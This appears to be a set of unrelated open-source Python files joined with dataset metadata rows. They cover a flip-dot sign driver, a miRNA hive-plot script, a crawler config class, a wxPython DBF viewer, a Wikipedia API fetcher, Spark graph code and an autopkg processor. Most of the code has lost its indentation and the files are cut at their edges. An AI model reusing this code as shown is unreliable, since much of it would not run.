image_for_transition = displayobject.crop((0 + horizontalcrop // 2, 0 + verticalcrop // 2,
displayobject.size[0] - horizontalcrop // 2 - horizontalcrop % 2,
displayobject.size[1] - verticalcrop // 2 - verticalcrop % 2))
# now that any cropping has been done, need to check if the image needs to be padded
            if image_for_transition.size[0] < self.columns or image_for_transition.size[1] < self.rows:
                image_for_transition = pad_image(image_for_transition, self.rows, self.columns, fill=0)
# if a message, we need to figure some things
elif isinstance(displayobject, Message):
# check the size of the phrase "ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz " to see how wide
# and tall the display is in terms of characters with the specified font
checkwidth, checkheight = font.getsize("ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz ")
checkwidth //= 54
display_width_chars = self.columns // checkwidth
display_height_chars = self.rows // checkheight
if display_height_chars < 1 or display_width_chars < 1:
raise ValueError("My font is too big! My font is TOO BIG!")
# set foundissue to true to ensure we check at least once
foundissue = True
# purpose of this loop is to check ensure we get a message that fits in the display
# the initial estimate of the number of characters is a guess - because some fonts do not have the same
# width for each character, the actual size taken up can depend on the message
# so, we check if the message fits. if it doesn't, we honor the font size provided and reduce the amount
# of space available for the message
while foundissue:
# tell the message to update with the estimated number of characters
displayobject.update(num_lines=display_height_chars, num_chars=display_width_chars)
totalheight = 0
maxwidth = 0
foundissue = False
# determine max dimensions of the image
for line in displayobject.get_message():
width, height = font.getsize(line)
totalheight += height
maxwidth = max(maxwidth, width)
# check against maximum display dimensions and update the "message size" if necessary
if maxwidth > self.columns:
foundissue = True
display_width_chars = int(display_width_chars * self.columns / maxwidth)
if totalheight > self.rows:
foundissue = True
display_height_chars = int(display_height_chars * self.rows / totalheight)
# at the end of the loop, totalheight and maxwidth should contain the actual values for the message
# if the provided transition function is messagetransition, apply it here to generate a message states list
# then turn those message states into display states
# otherwise, create a single-item list that is just the eventual message
if transitionfunction.is_message_transition:
# try to use transition function - if we get an assertion error, that means the current display state
# is an image, so a message transition is not possible
try:
messagestates = transitionfunction(self.currentmessage, displayobject.get_message())
except AssertionError:
messagestates = [displayobject.get_message()]
# since our function is a message function, we create the displaystates list here
for messagestate in messagestates:
image = message_to_image(messagestate, self.columns, self.rows, maxwidth, totalheight,
font, display_height_chars)
displaystates.append(image)
# since our function is not a message function, we just make the message into an image for transition
else:
image_for_transition = message_to_image(displayobject.get_message(), self.columns, self.rows, maxwidth,
totalheight, font, display_height_chars)
# write the message output to the self.currentmessage container, so future message transitions can work
self.currentmessage = displayobject.get_message()
else: # it's not a message or an image - technically this should not be possible because of the asserts
raise AssertionError("Assertion not working")
# if the provided transition function is a displaytransition, then use the transition function to generate
# desired display states
if transitionfunction.is_display_transition:
displaystates = transitionfunction(self.currentstate, image_for_transition)
# if we get this far and displaystates is still an empty list, then
# we got an image to display, but combined with a message transition. just use simpletransition
if displaystates == []:
displaystates = SimpleTransition(self.currentstate, image_for_transition)
# show the desired states on the display
for state in displaystates:
self.show(state)
self.currentstate = displaystates[-1]
class FakeFlipDotDisplay(FlipDotDisplay):
def __init__(self, rows, columns, serialinterface, layout):
self.file_number = 1
FlipDotDisplay.__init__(self, rows, columns, serialinterface, layout)
def show(self, desiredstate):
desiredstate.format = 'PNG'
statepath = '/Users/cmcd/PycharmProjects/SignStorage/'
desiredstate.save(statepath + str(self.file_number) + '.PNG', format='PNG')
self.file_number += 1
def pad_image(image, rows, columns, fill=0):
    """
    Takes in an image file, returns a padded image to fit the rectangle given by the rows and columns dimensions
    :param image: A PIL image object
    :param rows: integer, number of rows of pixels
    :param columns: integer, number of columns of pixels
    :param fill: an integer 1 or 0, indicating which color to fill the padded area with (1 = white, 0 = black)
    :return: A PIL image object of dimensions (rows, columns) with the provided image in the center
    """
    # create new image of the desired size, with the fill
    padded = Image.new('1', (columns, rows), fill)
    incolumns, inrows = image.size
    if incolumns > columns or inrows > rows:
        raise ValueError("Input image must be less than or equal to the output size in all dimensions.")
    # paste provided image into created image, such that it is as centered as possible in the new area
    padded.paste(image, ((columns - incolumns) // 2, (rows - inrows) // 2))
    return padded
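# Example with illustrative dimensions: centre a 20x10 image on a
# 28-row by 112-column panel, filling the border with black:
#
#     small = Image.new('1', (20, 10), 1)
#     panel = pad_image(small, rows=28, columns=112)  # panel.size == (112, 28)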
def initialize_row_spacing_lookup():
"""
Could not determine an algorithm for how to space the lines, so going to use a lookup table.
lookuptable[num_lines][extra_spaces] will contain a tuple (top,per_line) which indicates how many spaces go
at the top and how many go between each line.
:return: a lookup table, which is a list of lists of tuples.
"""
output = [[(None, None)]*12 for i in range(12)]
output[3][0] = (0, 0)
output[3][1] = (0, 0)
output[3][2] = (0, 1)
output[3][3] = (0, 1)
output[3][4] = (1, 1)
output[3][5] = (1, 1)
output[2][0] = (0, 0)
output[2][1] = (0, 1)
output[2][2] = (0, 1)
output[2][3] = (1, 1)
output[2][4] = (1, 2)
output[2][5] = (1, 2)
return output
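# Example reading of the table (straight from the assignments above):
#   initialize_row_spacing_lookup()[2][3] -> (1, 1), i.e. a 2-line message
#   with 3 spare pixel rows gets 1 blank row on top and 1 between lines.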
def message_to_image(message, columns, rows, max_width, total_height, font, display_height_chars):
image = Image.new('1', (columns, rows), 0)
# calculate x position to write the lines to - this is easy since it's just centering the stuff
xposition = (columns - max_width) // 2
# calculate y position and spacing - more difficult since there are multiple lines and spacing between
total_y_space = rows - total_height
yposition, per_line = initialize_row_spacing_lookup()[display_height_chars][total_y_space]
if yposition is None:
yposition = total_y_space // 2 + 1
per_line = 0
line_height = font.getsize('A')[1]
# iterate through the lines in the message, writing each line at the right position and then
# incrementing the position
for i in range(len(message)):
ImageDraw.Draw(image).text((xposition, yposition), message[i], fill=1, font=font)
yposition += line_height + per_line
return image
| cc0-1.0 | 6,451,781,360,778,824,000 | 47.850267 | 120 | 0.638588 | false | 4.446337 | false | false | false |
# File: CSB-IG/miRNAseq_rnw/source_scripts_data/hiveplot/hiveplot_mirna_genes.py
from pyveplot import *
import networkx as nx
import csv
import argparse
import math
import progressbar
def coords(radius, angle, origin=(0, 0)):
""" Returns a tuple of tuples of coordinates given a radius, angle and origin tuple """
return (origin[0] + round((radius * math.cos(math.radians(angle))), 2),
origin[1] + round((radius * math.sin(math.radians(angle))), 2))
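# Illustrative values (these follow directly from the formula above):
#   coords(100, -90) -> (0.0, -100.0)
#   coords(100, 0, origin=(10, 10)) -> (110.0, 10.0)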
from pprint import pprint
parser = argparse.ArgumentParser(description='hiveplot of mirna-gene interactions')
parser.add_argument('edgelist', type=argparse.FileType('r'), help="network in edgelist format")
parser.add_argument('plot', type=argparse.FileType('w'), help="plot file")
args = parser.parse_args()
# load edges into graph
g = nx.Graph()
for edge in csv.DictReader(args.edgelist, delimiter="\t"):
g.add_edge( edge['from'], edge['to'], w=float(edge['weight']) )
# sort nodes by degree
by_degree = {}
for n in g.nodes():
d = g.degree(n)
if d in by_degree:
by_degree[d].append(n)
else:
by_degree[d] = [n, ]
degree_ordered = []
for d in sorted(by_degree.keys(), reverse=False):
degree_ordered += by_degree[d]
# True when a gene has no other genes among its first neighbors (it only
# "talks to" miRNAs)
def only_talks_to_mrna(gene):
status = True
for n in g.neighbors(gene):
if not n.startswith('hsa'):
return False
return status
mirna_genes = []
genes = []
mirnas = []
# classify nodes
for n in degree_ordered:
if not n.startswith('hsa'):
genes.append(n)
if only_talks_to_mrna(n):
mirna_genes.append(n)
else:
mirnas.append(n)
h = Hiveplot( args.plot.name )
args.plot.close()
h.dwg.width=15000
h.dwg.height=15000
#centre = (len(mirnas)+30, len(mirnas)+30)
centre = (516*2, 516*2)
print "centre", centre
# configure mirna axes
m1 = Axis( coords(20, -90, centre), coords(len(mirnas)*2, -90, centre), stroke="#CBFF65", stroke_width=10)
m2 = Axis( coords(20, -180, centre), coords(len(mirnas)*2, -180, centre), stroke="#CBFF65", stroke_width=10)
pos = 0.0
delta = 1.0 / len(mirnas)
for n in mirnas:
node0 = Node(n)
node1 = Node(n)
m1.add_node( node0, pos )
m2.add_node( node1, pos )
pos += delta
g1 = Axis(coords(20, 0, centre), coords(len(genes)*0.5, 0, centre), stroke="#00C598", stroke_width=10)
g2 = Axis(coords(20, 90, centre), coords(len(genes)*0.5, 90, centre), stroke="#00C598", stroke_width=10)
pos = 0.0
delta = 1.0 / len(genes)
for n in genes:
node0 = Node(n)
node1 = Node(n)
g1.add_node( node0, pos )
g2.add_node( node1, pos )
pos += delta
h.axes = [m1, m2, g1, g2]
bar = progressbar.ProgressBar()
for e in bar(g.edges()):
if e[0] in mirnas and e[1] in mirnas: # mirnas to mirnas
h.connect(m2, e[0], 23,
m1, e[1], -23,
stroke_width = g.get_edge_data(*e)['w'] * 10,
stroke_opacity = 0.035,
stroke = 'grey')
if e[0] in mirnas and e[1] in genes and e[1] not in mirna_genes: # mirnas to genes
h.connect(m1, e[0], 23,
g1, e[1], -23,
stroke_width=g.get_edge_data(*e)['w'] * 10,
stroke_opacity=0.035,
stroke="grey")
if e[1] in mirnas and e[0] in genes and e[0] not in mirna_genes: # mirnas to genes
h.connect(m1, e[1], 23,
g1, e[0], -23,
stroke_width=g.get_edge_data(*e)['w'] * 10,
stroke_opacity=0.035,
stroke="grey")
if e[0] in genes and e[1] in genes: # genes to genes
h.connect(g1, e[0], 23,
g2, e[1], -23,
stroke_width = g.get_edge_data(*e)['w'] * 10,
stroke_opacity = 0.035,
stroke='grey')
if e[0] in mirnas and e[1] in mirna_genes: # mirnas to mirna-genes
h.connect(m2, e[0], -23,
g2, e[1], 23,
stroke_width=g.get_edge_data(*e)['w'] * 10,
stroke_opacity=0.035,
stroke="grey")
if e[1] in mirnas and e[0] in mirna_genes: # mirnas to mirna-genes
h.connect(m2, e[1], -23,
g2, e[0], 23,
stroke_width=g.get_edge_data(*e)['w'] * 10,
stroke_opacity=0.035,
stroke="grey")
print "saving"
h.save()
| gpl-3.0 | -6,586,333,391,598,297,000 | 26.968553 | 108 | 0.552732 | false | 2.954817 | false | false | false |
# File: sivabalan/libSeek/Crawler4py/Config.py
'''
@Author: Rohan Achar [email protected]
'''
import sys
from abc import *
class Config:
__metaclass__ = ABCMeta
def __init__(self):
#Number of Url Data Fetching Threads Allowed
self.MaxWorkerThreads = 8
#Timeout(Seconds) for trying to get the next url from the frontier.
self.FrontierTimeOut = 60
#Timeout(Seconds) for trying to get a free worker thread, (worker is taking too long maybe?)
self.WorkerTimeOut = 60
#Timeout(Seconds) for getting data from the output queue
self.OutBufferTimeOut = 60
#Timeout(Seconds) for getting data from a url
self.UrlFetchTimeOut = 2
#The User Agent String that this crawler is going to identify itself as. http://tools.ietf.org/html/rfc2616#section-14.43
        self.UserAgentString = None
#To allow resume of fetching from last point of closure. Set to False to always restart from seed set of urls.
self.Resumable = True
#Number of times to retry fetching a url if it fails
self.MaxRetryDownloadOnFail = 5
#PolitenessDelay that the crawler is forced to adhere to. http://en.wikipedia.org/wiki/Web_crawler#Politeness_policy
self.PolitenessDelay = 300
#The Persistent File to store current state of crawler for resuming (if Resumable is True)
self.PersistentFile = "Persistent.shelve"
#Total (Approximate) documents to fetch before stopping
self.NoOfDocToFetch = -1
#The Max Depth of the page to go to while fetching (depth = distance of first discovery from seed urls)
self.MaxDepth = -1
#Max size of page in bytes that is allowed to be fetched. (Only works for websites that send Content-Length in response header)
self.MaxPageSize = 1048576
#Max size of output queue. If the HandleData function is slow, then output buffer might not clear up fast.
#This enforces that the queue does not go beyond a certain size.
#Set to 0 if you want unlimited size
#Advantages of setting > 0: Fetch url waits for the buffer to become free when its full. If crawler crashes max of this size output is lost.
#Disadvantage of setting > 0: Slows down the crawling.
self.MaxQueueSize = 0
#This ignores the rules at robot.txt. Be very careful with this. Only make it True with permission of the host/API pulling that does not need robot rules.
self.IgnoreRobotRule = False
#This sets the mode of traversal: False -> Breadth First, True -> Depth First.
self.DepthFirstTraversal = False
def ValidateConfig(self):
'''Validates the config to see if everything is in order. No need to extend this'''
try:
            assert (self.UserAgentString and self.UserAgentString != "Set This Value!")
except AssertionError:
print ("Set value of UserAgentString")
sys.exit(1)
try:
assert (self.MaxWorkerThreads != 0)
except AssertionError:
print ("MaxWorkerThreads cannot be 0")
sys.exit(1)
@abstractmethod
def GetSeeds(self):
'''Returns the first set of urls to start crawling from'''
return ["Sample Url 1", "Sample Url 2", "Etc"]
@abstractmethod
def HandleData(self, parsedData):
'''Function to handle url data. Guaranteed to be Thread safe.
parsedData = {"url" : "url", "text" : "text data from html", "html" : "raw html data"}
Advisable to make this function light. Data can be massaged later. Storing data probably is more important'''
print (parsedData["url"])
pass
def AllowedSchemes(self, scheme):
'''Function that allows the schemes/protocols in the set.'''
return scheme.lower() in set(["http", "https", "ftp", b"http", b"https", b"ftp"])
@abstractmethod
def ValidUrl(self, url):
'''Function to determine if the url is a valid url that should be fetched or not.'''
        return True
        # Example of a concrete implementation (commented out; it would
        # require ``from urlparse import urlparse`` and ``import re``):
        #     parsed = urlparse(url)
        #     try:
        #         return ".ics.uci.edu" in parsed.hostname.decode("utf-8") \
        #             and not re.match(".*\.(css|js|bmp|gif|jpe?g|ico|png|tiff?|mid|mp2|mp3|mp4)$", parsed.path.decode("utf-8"))
        #     except TypeError:
        #         print ("TypeError for ", parsed)
def GetTextData(self, htmlData):
'''Function to clean up html raw data and get the text from it. Keep it small.
Not thread safe, returns an object that will go into the parsedData["text"] field for HandleData function above'''
        import nltk
        # note: nltk.clean_html() exists only in NLTK 2.x; NLTK 3 removed it
        return nltk.clean_html(htmlData)
def ExtractNextLinks(self, url, rawData, outputLinks):
'''Function to extract the next links to iterate over. No need to validate the links. They get validated at the ValudUrl function when added to the frontier
Add the output links to the outputLinks parameter (has to be a list). Return Bool signifying success of extracting the links.
rawData for url will not be stored if this function returns False. If there are no links but the rawData is still valid and has to be saved return True
Keep this default implementation if you need all the html links from rawData'''
from lxml import html,etree
try:
htmlParse = html.document_fromstring(rawData)
htmlParse.make_links_absolute(url)
except etree.ParserError:
return False
except etree.XMLSyntaxError:
return False
for element, attribute, link, pos in htmlParse.iterlinks():
outputLinks.append(link)
return True
def GetAuthenticationData(self):
''' Function that returns dict(top_level_url : tuple(username, password)) for basic authentication purposes'''
        return {}
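# A minimal sketch of a concrete crawler configuration (names and URLs are
# illustrative; a real subclass must implement every abstractmethod above):
#
#     class MyConfig(Config):
#         def GetSeeds(self):
#             return ["http://example.com/"]
#
#         def HandleData(self, parsedData):
#             print (parsedData["url"])
#
#         def ValidUrl(self, url):
#             return url.startswith("http://example.com/")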
# File: GeoDaCenter/CAST/stars/visualization/DataWidget.py
"""
"""
__author__ = "Xun Li <[email protected]>"
__all__ = ['DataListCtrl','DataTablePanel','DataWidget']
import sys
import wx
import wx.lib.mixins.listctrl as listmix
import wx.grid as gridlib
import stars
from stars.model import *
from stars.visualization.EventHandler import *
from stars.visualization.AbstractWidget import *
from stars.visualization.AbstractCanvas import AbstractCanvas
class DataGrid(wx.grid.Grid):
def __init__(self, parent, dbf):
wx.grid.Grid.__init__(self, parent, -1)
self.dbf = dbf
n_cols = len(dbf.header)
n_rows = dbf.n_records
self.CreateGrid(n_rows, n_cols)
raw_dbf_data = []
for i in range(n_rows):
row_data = dbf.read_record(i)
for j in range(n_cols):
self.SetCellValue(i,j, str(row_data[j]))
raw_dbf_data.append(row_data)
self.dbf.records = raw_dbf_data
for i in range(n_cols):
self.SetColLabelValue(i, dbf.header[i])
self.Bind(wx.EVT_IDLE, self.OnIdle)
def OnIdle(self, event):
pass
class DataTablePanel1(wx.Panel, AbstractCanvas):
"""
Panel displaying dbf DataTable.
The wxPanel container for DataList (wx.ListCtrl).
"""
def __init__(self, parent, shapefileObject, name):
wx.Panel.__init__(self, parent, -1, style=wx.WANTS_CHARS)
from stars.visualization.maps.BaseMap import PolygonLayer, PointLayer, LineLayer
self.layer = shapefileObject
self.dbf = self.layer.dbf
self.name = name
self.parent = parent
self.current_selected = {} # {id: centroid}
self.isEvtHandle = False
self.table = DataGrid(self, self.dbf)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.table, 1, wx.EXPAND)
if self.layer.shape_type == stars.SHP_POINT:
self.draw_layer = PointLayer(self,self.layer)
elif self.layer.shape_type == stars.SHP_LINE:
self.draw_layer = LineLayer(self, self.layer)
elif self.layer.shape_type == stars.SHP_POLYGON:
self.draw_layer = PolygonLayer(self,self.layer)
self.SetSizer(sizer)
self.SetAutoLayout(True)
# table events
#self.table.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected)
#self.table.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnItemDeselected)
# register event_handler to THE OBSERVER
while parent != None:
if isinstance(parent, stars.Main):
self.observer = parent.observer
parent = parent.GetParent()
self.Register(stars.EVT_OBJS_SELECT, self.OnRecordsSelect)
self.Register(stars.EVT_OBJS_UNSELECT, self.OnNoRecordSelect)
self.parent.Bind(wx.EVT_CLOSE, self.OnClose) # OnClose Only send to Frame/Dialog
def OnClose(self, event):
self.Unregister(stars.EVT_OBJS_SELECT, self.OnRecordsSelect)
self.Unregister(stars.EVT_OBJS_UNSELECT, self.OnNoRecordSelect)
event.Skip()
def OnRecordsSelect(self, event):
pass
def OnNoRecordSelect(self, event):
pass
class DataListCtrl(wx.ListCtrl):
"""
Virtual ListCtrl for fast display on large DBF file
"""
def __init__(self, parent, ID, dbf, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=wx.LC_REPORT|wx.LC_VIRTUAL|wx.LC_HRULES|wx.LC_VRULES):
wx.ListCtrl.__init__(self, parent, ID, pos, size, style)
self.dbf = dbf
self.SetItemCount(dbf.n_records)
n_columns = len(dbf.header)
self.InsertColumn(0, "")
for i,item in enumerate(dbf.header):
self.InsertColumn(i+1, item)
self.il = wx.ImageList(16,16)
open_bmp = wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, wx.ART_TOOLBAR, (16,16))
self.idx1 = self.il.Add(open_bmp)
self.SetImageList(self.il,wx.IMAGE_LIST_NORMAL)
def OnGetItemText(self, item, col):
if col == 0: return str(item+1)
#return self.dbf.read_record(item)[col]
return self.dbf.read_record(item)[col-1]
class DataTablePanel(wx.Panel, AbstractCanvas, listmix.ColumnSorterMixin):
"""
Panel displaying dbf DataTable.
The wxPanel container for DataList (wx.ListCtrl).
"""
def __init__(self, parent, shapefileObject, name):
wx.Panel.__init__(self, parent, -1, style=wx.WANTS_CHARS)
from stars.visualization.maps.BaseMap import PolygonLayer, PointLayer, LineLayer
self.layer = shapefileObject
self.dbf = self.layer.dbf
self.name = name
self.parent = parent
self.current_selected = {} # {id: centroid}
self.isEvtHandle = False
tID = wx.NewId()
self.table = DataListCtrl(
self,
tID,
self.dbf,
style=wx.LC_REPORT
| wx.LC_VIRTUAL
#| wx.BORDER_SUNKEN
| wx.BORDER_NONE
| wx.LC_EDIT_LABELS
#| wx.LC_SORT_ASCENDING
#| wx.LC_NO_HEADER
| wx.LC_VRULES
| wx.LC_HRULES
#| wx.LC_SINGLE_SEL
)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.table, 1, wx.EXPAND)
if self.layer.shape_type == stars.SHP_POINT:
self.draw_layer = PointLayer(self,self.layer)
elif self.layer.shape_type == stars.SHP_LINE:
self.draw_layer = LineLayer(self, self.layer)
elif self.layer.shape_type == stars.SHP_POLYGON:
self.draw_layer = PolygonLayer(self,self.layer)
self.SetSizer(sizer)
self.SetAutoLayout(True)
# table events
self.table.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected)
self.table.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnItemDeselected)
# register event_handler to THE OBSERVER
while parent != None:
if isinstance(parent, stars.Main):
self.observer = parent.observer
parent = parent.GetParent()
self.Register(stars.EVT_OBJS_SELECT, self.OnRecordsSelect)
self.Register(stars.EVT_OBJS_UNSELECT, self.OnNoRecordSelect)
self.parent.Bind(wx.EVT_CLOSE, self.OnClose) # OnClose Only send to Frame/Dialog
def OnClose(self, event):
self.Unregister(stars.EVT_OBJS_SELECT, self.OnRecordsSelect)
self.Unregister(stars.EVT_OBJS_UNSELECT, self.OnNoRecordSelect)
event.Skip()
def update_table(self, dbf):
"""
Get and display data from dbf File on DataList (wx.ListCtrl)
"""
self.table.ClearAll()
self.table.SetItemCount(dbf.n_records)
n_columns = len(dbf.header)
self.table.InsertColumn(0, "ID")
for i,item in enumerate(dbf.header):
self.table.InsertColumn(i+1, item)
def OnItemSelected(self, event):
if self.isEvtHandle == False:
# prevent backforce Event
if self.table.SelectedItemCount == 1:
self.current_selected = {}
if not self.current_selected.has_key(event.m_itemIndex):
dummy_region = []
# find centroid of current_select objec
if self.layer.shape_type == stars.SHP_POLYGON:
centroids = self.layer.centroids[event.m_itemIndex]
for centroid in centroids:
dummy_region += centroid + centroid
else:
point = list(self.layer.shape_objects[event.m_itemIndex])
dummy_region = point + point
self.current_selected[event.m_itemIndex] = dummy_region
# trigger Upadte Event to notify other
# widgets to drawing the selected items
self.OnRecordsSelect(None)
event.Skip()
def OnItemDeselected(self, event):
if self.isEvtHandle == False:
# prevent backforce Event
if self.current_selected.has_key(event.m_itemIndex):
self.current_selected.pop(event.m_itemIndex)
# trigger Upadte Event to notify other
# widgets to drawing the selected items
self.OnRecordsSelect(None)
event.Skip()
def unhighlight_selected(self):
for item in self.current_selected:
self.table.SetItemState(item, 0, wx.LIST_STATE_SELECTED)# | wx.LIST_STATE_FOCUSED)
def highlight_selected(self):
if len(self.current_selected) > 0:
first = self.current_selected.keys()[0]
for item in self.current_selected:
if item == first:
self.table.EnsureVisible(item)
self.table.SetItemState(item, wx.LIST_STATE_SELECTED, wx.LIST_STATE_SELECTED)#|wx.LIST_STATE_FOCUSED)
#------------------------------
# Belows are Event handlers
#------------------------------
def OnRecordsSelect(self, event):
if event == None:
# trigger other widgets
data = AbstractData(self)
data.shape_ids[self.name] = self.current_selected.keys()
data.boundary = self.current_selected.values()
self.UpdateEvt(stars.EVT_OBJS_SELECT, data)
else:
# trigged by other widgets
self.isEvtHandle = True
data = event.data
if data.shape_ids.has_key(self.name):
# unselect first
self.unhighlight_selected()
# then select trigged
selected_id_list = data.shape_ids[self.name]
self.current_selected = {}
for i in selected_id_list:
self.current_selected[i] = None
self.highlight_selected()
else:
# unselect first
self.unhighlight_selected()
self.current_selected = {}
# try to test if query regions can be used
# to find shape ids
query_regions = data.boundary
if query_regions == None or len(query_regions) == 0:
pass
else:
if isinstance(query_regions[0], float):
query_regions = [query_regions]
for region in query_regions:
shape_ids, query_region = self.draw_layer.get_selected_by_region(None, region)
for id in shape_ids:
self.current_selected[id] = None
self.highlight_selected()
self.isEvtHandle = False
def OnNoRecordSelect(self, event):
self.isEvtHandle = True
for item in self.current_selected:
self.table.SetItemState(item, 0, wx.LIST_STATE_SELECTED)# | wx.LIST_STATE_FOCUSED)
self.isEvtHandle = False
class DataWidget(AbstractWidget):
"""
Widget for displaying dbf table, the layout should be like this:
-------------------------
| toolbar |
--------------------------
| |
| |
| Table |
| |
| |
--------------------------
"""
def __init__(self, parent, shp, name):
self.shp= shp
self.name = name
AbstractWidget.__init__(self, parent, self.name, pos=(60, 60), size=(600, 350))
#self.toolbar = self._create_toolbar()
#self.SetToolBar(self.toolbar)
#self.toolbar.Realize()
self.status_bar = self.CreateStatusBar()
self.data_table = DataTablePanel(self,self.shp,self.name)
self.canvas = self.data_table
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.data_table, 1, wx.EXPAND)
self.SetSizer(sizer)
self.SetAutoLayout(True)
def _create_toolbar(self):
tsize = (16,16)
toolbar = self.CreateToolBar()
open_bmp = wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, wx.ART_TOOLBAR, tsize)
close_bmp = wx.ArtProvider.GetBitmap(wx.ART_FOLDER, wx.ART_TOOLBAR, tsize)
toolbar.AddLabelTool(1001, "Filter Data", open_bmp)
toolbar.AddLabelTool(1002, "Close", close_bmp)
toolbar.EnableTool(1002, False)
self.Bind(wx.EVT_TOOL, self.OnFilterData, id=1001)
return toolbar
    def OnFilterData(self, event):
        # SpaceTimeQuery is expected to be imported elsewhere in this package
        frame = SpaceTimeQuery(self.data_table, "SpaceTime Query", self.data_table.dbf)
frame.Show()
# File: nik7273/computational-medical-knowledge/Area 51/TestingWikiAPIProperties.py
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 30 19:08:33 2014
@author: Nik
"""
import json, requests, sys, codecs, nltk
from HTMLParser import HTMLParser
#function to strip html tags: taken from http://stackoverflow.com/questions/753052/strip-html-from-strings-in-python
"""class MLStripper(HTMLParser):
def __init__(self):
self.reset()
self.fed = []
def handle_data(self, d):
self.fed.append(d)
def get_data(self):
return ''.join(self.fed)
def strip_tags(html):
s = MLStripper()
s.feed(html)
return s.get_data()"""
# Checks title for spacing so that the space can be replaced with an underscore in the parameters for the URL. sys.argv[1]
# is used so PATH variable isn't put into parameters for URL
title = sys.argv[1]
x = title.replace(" ", "_") if " " in title else title
#Parameters to be passed into the url
parameters = {'format' : 'json', 'action' : 'query', 'titles' : x, 'prop' : 'revisions', 'rvprop' : 'ids', 'continue' : '', 'rvlimit' : '10'}
#getting the content of the url
r = requests.get('http://en.wikipedia.org/w/api.php', params=parameters)
#turning that content into json and loading it
data = r.json()
#writing json content to file
with open('testedRevData.json', 'w') as outfile:
json.dump(data, outfile)
#writing plaintext to file
"""with codecs.open('testedRevData.txt', 'w', 'utf-8') as file2:
ids = data['query']['pages'].keys()
text = ' '.join([data['query']['pages'][idx]['extract'] for idx in ids])
text = strip_tags(text)
file2.write(text)"""
# File: mssalvador/WorkflowCleaning/semisupervised/labelpropagation/lp_generate_graph.py
import pyspark.ml.linalg as ml_linalg
from pyspark.mllib.linalg.distributed import MatrixEntry
from pyspark.ml import feature
from pyspark.sql.functions import udf
import numpy as np
def _compute_bfs(vec_1, vec_2, sigma=0.42):
    # Gaussian (RBF) affinity: exp(-||vec_1 - vec_2||^2 / sigma^2)
    return np.exp(-vec_1.squared_distance(vec_2) / sigma ** 2)
def _tolerance_cut(value, tol=10e-10):
if value <= tol:
return 0
else:
return value
def _to_dense(x):
try:
return ml_linalg.DenseVector(x.toArray())
except Exception as e:
print(e)
return x
def _make_feature_vector(df, feature_col=None):
return 'features', feature.VectorAssembler(inputCols=feature_col, outputCol='features').transform(df)
def _scale_data_frame(df, vector=None):
if vector:
df = df.withColumn(vector, udf(_to_dense, ml_linalg.VectorUDT())(vector))
scale = feature.StandardScaler(
withMean=True, withStd=True,
inputCol=vector, outputCol='std_vector')
model = scale.fit(df)
return (model
.transform(df)
.select([i for i in df.columns if i != vector] + [scale.getOutputCol()])
.withColumnRenamed(existing=scale.getOutputCol(), new=vector))
def do_cartesian(sc, df, id_col=None, feature_col=None, **kwargs):
import functools
sigma = kwargs.get('sigma', 0.42)
tol = kwargs.get('tol', 10e-10)
standardize = kwargs.get('standardize', True)
if isinstance(feature_col, list):
feature_col, scaled_df = _make_feature_vector(df=df, feature_col=feature_col)
if standardize:
scaled_df = _scale_data_frame(scaled_df, vector=feature_col)
if id_col:
vector_dict = scaled_df.select(id_col, feature_col).rdd.collectAsMap()
else:
vector_dict = (scaled_df.select(feature_col)
.rdd.zipWithIndex().map(lambda x: (x[1], x[0][feature_col]))
.collectAsMap())
bc_vec = sc.broadcast(vector_dict)
index_rdd = df.rdd.map(lambda x: x[id_col]).cache()
bfs = functools.partial(_compute_bfs)
cartesian_demon = index_rdd.cartesian(index_rdd).filter(lambda x: x[0] >= x[1])
cartesian_distance_demon = cartesian_demon.map(
lambda x: MatrixEntry(x[0], x[1], bfs(
vec_1=bc_vec.value.get(x[0]),
vec_2=bc_vec.value.get(x[1]),
sigma=sigma))
)
index_rdd.unpersist() # Memory cleanup!
tol_cut = functools.partial(_tolerance_cut, tol=tol)
return cartesian_distance_demon.filter(lambda x: tol_cut(x.value))
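# A minimal usage sketch (column names are illustrative; assumes a live
# SparkContext `sc` and a DataFrame `df` with an 'id' column and numeric
# feature columns):
#
#     entries = do_cartesian(sc, df, id_col='id', feature_col=['x', 'y'],
#                            sigma=0.42, tol=10e-10)
#     # entries is an RDD of MatrixEntry(i, j, affinity) for i >= j,
#     # suitable for building a CoordinateMatrix.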
# File: fabien-michel/mosen-recipes/Processors/FlatPkgVersioner.py
#!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Basically copied line for line and adapted from Greg Neagle's Munki project.
# See: https://github.com/munki/munki/blob/master/code/client/munkilib/munkicommon.py#L1507
import os
import tempfile
import subprocess
import shutil
from glob import glob
from autopkglib import ProcessorError
from DmgMounter import DmgMounter
__all__ = ["FlatPkgVersioner"]
class FlatPkgVersioner(DmgMounter):
description = ("Expands PackageInfo and Distribution information from a flat package using xar,"
"then parses version information")
input_variables = {
"flat_pkg_path": {
"required": True,
"description": ("Path to a flat package. "
"Can point to a globbed path inside a .dmg which will "
"be mounted."),
}
}
output_variables = {
"version": {
"description": "Version of the item.",
},
}
source_path = None
def main(self):
# Check if we're trying to copy something inside a dmg.
(dmg_path, dmg, dmg_source_path) = self.env[
'flat_pkg_path'].partition(".dmg/")
dmg_path += ".dmg"
try:
if dmg:
# Mount dmg and copy path inside.
mount_point = self.mount(dmg_path)
self.source_path = glob(
os.path.join(mount_point, dmg_source_path))[0]
else:
# Straight copy from file system.
self.source_path = self.env['flat_pkg_path']
